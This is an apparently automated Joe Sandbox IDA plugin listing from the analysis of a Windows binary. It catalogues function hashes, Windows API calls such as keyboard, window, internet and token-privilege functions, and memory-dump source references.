                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: FromProg$FreeTask_memcmp
                                        • String ID:
                                        • API String ID: 314563124-0
                                        • Opcode ID: 6a0747fd1c69316a32433b7113e385dff8d55be1ca6e6b580745d45f8c823bf1
                                        • Instruction ID: a83fdcf077d85e30e8b60ea74a9769266a2292db8b7a0cf3d3bde60bcaed7510
                                        • Opcode Fuzzy Hash: 6a0747fd1c69316a32433b7113e385dff8d55be1ca6e6b580745d45f8c823bf1
                                        • Instruction Fuzzy Hash: 59811971A00109EFCB04DF94C984EEEB7B9FF89315F204199E546BB250EB71AE06CB60
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Variant$AllocClearCopyInitString
                                        • String ID:
                                        • API String ID: 2808897238-0
                                        • Opcode ID: 9f09303c04e9b46368a53cd3b4473678fb6e0ad01d336409d3c15ac7bc8bddfb
                                        • Instruction ID: 467569dcfcfc7cfd31aa5ea83ebae361789cd71f72c3189a1bd0fd3aa43aeaaf
                                        • Opcode Fuzzy Hash: 9f09303c04e9b46368a53cd3b4473678fb6e0ad01d336409d3c15ac7bc8bddfb
                                        • Instruction Fuzzy Hash: 9651B934B047019ADB30AF65D891A6DB3E5EF48310F24B81FE99AFB3D1EB7098419B51
                                        APIs
                                        • GetWindowRect.USER32(0116F8D8,?), ref: 00F09AD2
                                        • ScreenToClient.USER32(00000002,00000002), ref: 00F09B05
                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00F09B72
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$ClientMoveRectScreen
                                        • String ID:
                                        • API String ID: 3880355969-0
                                        • Opcode ID: 7d600cb4e1ac2e034768cab0e9e0695825a2591aa5598c979f18fff75536c38b
                                        • Instruction ID: b2ee47ac841638a716d462d66fbcd29b11139ab99a1756e89cb8d550504b7d39
                                        • Opcode Fuzzy Hash: 7d600cb4e1ac2e034768cab0e9e0695825a2591aa5598c979f18fff75536c38b
                                        • Instruction Fuzzy Hash: 95514C74A04209AFCF24DF58D8809AE7BB6FF95334F148159F8159B291E770AE81EB50
                                        APIs
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00EEBB09
                                        • GetLastError.KERNEL32(?,00000000), ref: 00EEBB2F
                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00EEBB54
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00EEBB80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                        • String ID:
                                        • API String ID: 3321077145-0
                                        • Opcode ID: 63247360016d4ffbcb5f2d67087e9fcda6b9914dbfebf398f48e582762788831
                                        • Instruction ID: beca317f359df26371d86df7f2276e4e5ff4f20ff998122791107a5f57a4713c
                                        • Opcode Fuzzy Hash: 63247360016d4ffbcb5f2d67087e9fcda6b9914dbfebf398f48e582762788831
                                        • Instruction Fuzzy Hash: B1412839600654DFCB20EF15C584A6EBBE1EF89314B199498E84EAB762CB34FD01DB91
                                        APIs
                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F08B4D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: InvalidateRect
                                        • String ID:
                                        • API String ID: 634782764-0
                                        • Opcode ID: b97c221ef1b84398f8f1266274c942c52e168662d3c6b8b0d30b2ab4d8bc782f
                                        • Instruction ID: 7f2bf885a35c4325e4cbf95e67f939301a030503e586d05986bee9d36bc477fd
                                        • Opcode Fuzzy Hash: b97c221ef1b84398f8f1266274c942c52e168662d3c6b8b0d30b2ab4d8bc782f
                                        • Instruction Fuzzy Hash: 7D31D4F4A00208BEEF349E18CC45FA93BA5FB463A0F244512FAD1D76E1DE34A942B751
                                        APIs
                                        • ClientToScreen.USER32(?,?), ref: 00F0AE1A
                                        • GetWindowRect.USER32(?,?), ref: 00F0AE90
                                        • PtInRect.USER32(?,?,00F0C304), ref: 00F0AEA0
                                        • MessageBeep.USER32(00000000), ref: 00F0AF11
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Rect$BeepClientMessageScreenWindow
                                        • String ID:
                                        • API String ID: 1352109105-0
                                        • Opcode ID: 419f02e2554af74aa439465bdea940b785497d774ef7935a90bef340f9742e5b
                                        • Instruction ID: 04af0cb72e659916a9ee44339fc3e321247a55e57cf8c47d673e6d3f567ebedf
                                        • Opcode Fuzzy Hash: 419f02e2554af74aa439465bdea940b785497d774ef7935a90bef340f9742e5b
                                        • Instruction Fuzzy Hash: E7417B75A00319DFCB11CF59C884BA9BBF5FF4A351F2881A9E814CB291D731A841FB92
                                        APIs
                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00EE1037
                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00EE1053
                                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00EE10B9
                                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00EE110B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: KeyboardState$InputMessagePostSend
                                        • String ID:
                                        • API String ID: 432972143-0
                                        • Opcode ID: e9b5dab0a3893c1e57355614411857aab3954bda8e7342f7848dfe7764c3b06a
                                        • Instruction ID: 4ba782aa2bce8ac73cefe93042a45cfaf91413633b74794225568803668641f9
                                        • Opcode Fuzzy Hash: e9b5dab0a3893c1e57355614411857aab3954bda8e7342f7848dfe7764c3b06a
                                        • Instruction Fuzzy Hash: 37315630E446CCAEFF308B678C05BFEBBA9AB45324F08629AE591721D1C3758DC49761
                                        APIs
                                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00EE1176
                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00EE1192
                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 00EE11F1
                                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00EE1243
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: KeyboardState$InputMessagePostSend
                                        • String ID:
                                        • API String ID: 432972143-0
                                        • Opcode ID: 41816faf08f73623112e1ab03771726733d282de105f383899f4091e82b55076
                                        • Instruction ID: eb048514ae79e0efb1d13d5df4f683db2f4385f2a02e732ad0c1c83e4b52c68b
                                        • Opcode Fuzzy Hash: 41816faf08f73623112e1ab03771726733d282de105f383899f4091e82b55076
                                        • Instruction Fuzzy Hash: 9A316830A4128C9AEF308AA78C047FE7BAAAB49314F08639AE691B21E1C37449C49751
                                        APIs
                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00EB644B
                                        • __isleadbyte_l.LIBCMT ref: 00EB6479
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EB64A7
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EB64DD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                        • String ID:
                                        • API String ID: 3058430110-0
                                        • Opcode ID: 0139b62e8429261c5a6c56fa3edbedaac796c928465bab6701fe729ad322e0bd
                                        • Instruction ID: 9fea583122a09e8e3c7e93367b09e75f540668cc9c479ca5b1c54398a93c93e3
                                        • Opcode Fuzzy Hash: 0139b62e8429261c5a6c56fa3edbedaac796c928465bab6701fe729ad322e0bd
                                        • Instruction Fuzzy Hash: 1231EF3160064AAFDB218F74C844BFB7BE9FF41314F155429F864AB1A0EB39E850DB90
                                        APIs
                                        • GetForegroundWindow.USER32 ref: 00F05189
                                          • Part of subcall function 00EE387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00EE3897
                                          • Part of subcall function 00EE387D: GetCurrentThreadId.KERNEL32 ref: 00EE389E
                                          • Part of subcall function 00EE387D: AttachThreadInput.USER32(00000000,?,00EE52A7), ref: 00EE38A5
                                        • GetCaretPos.USER32(?), ref: 00F0519A
                                        • ClientToScreen.USER32(00000000,?), ref: 00F051D5
                                        • GetForegroundWindow.USER32 ref: 00F051DB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                        • String ID:
                                        • API String ID: 2759813231-0
                                        • Opcode ID: e6f701039f66a247067f1db79763a8588958dd892786a47c5bc04d2c13012801
                                        • Instruction ID: 6ef0e90ab8e974fa7699ce05f0d075b5b812b3be9535c08b408c084750dbb2d6
                                        • Opcode Fuzzy Hash: e6f701039f66a247067f1db79763a8588958dd892786a47c5bc04d2c13012801
                                        • Instruction Fuzzy Hash: B6310E71D00108AFDB14EFA5C9859EFB7F9EF98304F14506AE41AF7242EA759E05CBA0
                                        APIs
                                        • __setmode.LIBCMT ref: 00EA0BF2
                                          • Part of subcall function 00E85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00EE7B20,?,?,00000000), ref: 00E85B8C
                                          • Part of subcall function 00E85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00EE7B20,?,?,00000000,?,?), ref: 00E85BB0
                                        • _fprintf.LIBCMT ref: 00EA0C29
                                        • OutputDebugStringW.KERNEL32(?), ref: 00ED6331
                                          • Part of subcall function 00EA4CDA: _flsall.LIBCMT ref: 00EA4CF3
                                        • __setmode.LIBCMT ref: 00EA0C5E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                        • String ID:
                                        • API String ID: 521402451-0
                                        • Opcode ID: 553d00a8b0702b1d5a286bf84c5b756dd7e927a3b46308bf1e6280fd99595ea6
                                        • Instruction ID: 027ec55713a215bf06d8e0529e0dcb1984ecca31985ed2e71bb2461876116aaf
                                        • Opcode Fuzzy Hash: 553d00a8b0702b1d5a286bf84c5b756dd7e927a3b46308bf1e6280fd99595ea6
                                        • Instruction Fuzzy Hash: 911127729042087FCB04B7B49C439BEBBE89FCA320F14215AF20C7B1C2DEA16D469791
                                        APIs
                                          • Part of subcall function 00ED8652: GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 00ED8669
                                          • Part of subcall function 00ED8652: GetLastError.KERNEL32(?,TokenPrivileges,?,00000000,?), ref: 00ED8673
                                          • Part of subcall function 00ED8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenPrivileges,?,00000000,?), ref: 00ED8682
                                          • Part of subcall function 00ED8652: RtlAllocateHeap.NTDLL(00000000,?,TokenPrivileges), ref: 00ED8689
                                          • Part of subcall function 00ED8652: GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 00ED869F
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00ED8BEB
                                        • _memcmp.LIBCMT ref: 00ED8C0E
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00ED8C44
                                        • HeapFree.KERNEL32(00000000), ref: 00ED8C4B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                                        • String ID:
                                        • API String ID: 2182266621-0
                                        • Opcode ID: b471b8b97d32d53bc1c772e17603f7f7d4e797ed5ad3c2e1c48ef68ac1641998
                                        • Instruction ID: fa9730d303b23209efdf6aad57a81b930db039ede498186dfbecb64c8cb3d82d
                                        • Opcode Fuzzy Hash: b471b8b97d32d53bc1c772e17603f7f7d4e797ed5ad3c2e1c48ef68ac1641998
                                        • Instruction Fuzzy Hash: 9C218971E11208EBDB10CFA4CA48BEEB7B8EF54354F04409AE454AB240EB31AA06DB61
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EF1A97
                                          • Part of subcall function 00EF1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EF1B40
                                          • Part of subcall function 00EF1B21: InternetCloseHandle.WININET(00000000), ref: 00EF1BDD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Internet$CloseConnectHandleOpen
                                        • String ID:
                                        • API String ID: 1463438336-0
                                        • Opcode ID: 81a6ec6cd7e82728ed8b66877abca4045116ccc916e92e583365ef1b5d08de32
                                        • Instruction ID: 5fd95e0f9e123b57695847eeb8815fc78332a569e461ba3e3b7f284a36873b6f
                                        • Opcode Fuzzy Hash: 81a6ec6cd7e82728ed8b66877abca4045116ccc916e92e583365ef1b5d08de32
                                        • Instruction Fuzzy Hash: 69219F35200A0DFFDB229F608C01FBAB7A9FF84701F10105EFB11A6651EB719815ABA1
                                        APIs
                                          • Part of subcall function 00EDF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00EDE1C4,?,?,?,00EDEFB7,00000000,000000EF,00000119,?,?), ref: 00EDF5BC
                                          • Part of subcall function 00EDF5AD: lstrcpyW.KERNEL32(00000000,?,?,00EDE1C4,?,?,?,00EDEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00EDF5E2
                                          • Part of subcall function 00EDF5AD: lstrcmpiW.KERNEL32(00000000,?,00EDE1C4,?,?,?,00EDEFB7,00000000,000000EF,00000119,?,?), ref: 00EDF613
                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00EDEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00EDE1DD
                                        • lstrcpyW.KERNEL32(00000000,?,?,00EDEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00EDE203
                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00EDEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00EDE237
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: lstrcmpilstrcpylstrlen
                                        • String ID: cdecl
                                        • API String ID: 4031866154-3896280584
                                        • Opcode ID: 42b3ea181efe5b7baf0766340fe0a0a875cf71a0645e235911ad0eb64329b713
                                        • Instruction ID: 0a9784b71f555509e9d5bf7d1e1053fc0e4a3db01f02fae9fd7259c867531553
                                        • Opcode Fuzzy Hash: 42b3ea181efe5b7baf0766340fe0a0a875cf71a0645e235911ad0eb64329b713
                                        • Instruction Fuzzy Hash: A3118136200345EFCB25AF64DC4997A77B8FF49354B40502BF816DB360EB71A85297A0
                                        APIs
                                        • _free.LIBCMT ref: 00EB5351
                                          • Part of subcall function 00EA594C: __FF_MSGBANNER.LIBCMT ref: 00EA5963
                                          • Part of subcall function 00EA594C: __NMSG_WRITE.LIBCMT ref: 00EA596A
                                          • Part of subcall function 00EA594C: RtlAllocateHeap.NTDLL(01150000,00000000,00000001), ref: 00EA598F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AllocateHeap_free
                                        • String ID:
                                        • API String ID: 614378929-0
                                        • Opcode ID: a900ec1250b1258bf4754ca65f72d828a4674a6bff759937ad9fb6d44bd09585
                                        • Instruction ID: 4e60240ed5239a1931f22d4cfcc3926e54f2fb67b2be65d121e45a594b57503a
                                        • Opcode Fuzzy Hash: a900ec1250b1258bf4754ca65f72d828a4674a6bff759937ad9fb6d44bd09585
                                        • Instruction Fuzzy Hash: 1111A733904A15AFCB312F74AC457DF37D86F1A3B4B20242AFA45BE291DFB5A9409790
                                        APIs
                                        • _memset.LIBCMT ref: 00E84560
                                          • Part of subcall function 00E8410D: _memset.LIBCMT ref: 00E8418D
                                          • Part of subcall function 00E8410D: _wcscpy.LIBCMT ref: 00E841E1
                                          • Part of subcall function 00E8410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E841F1
                                        • KillTimer.USER32(?,00000001,?,?), ref: 00E845B5
                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E845C4
                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EBD6CE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
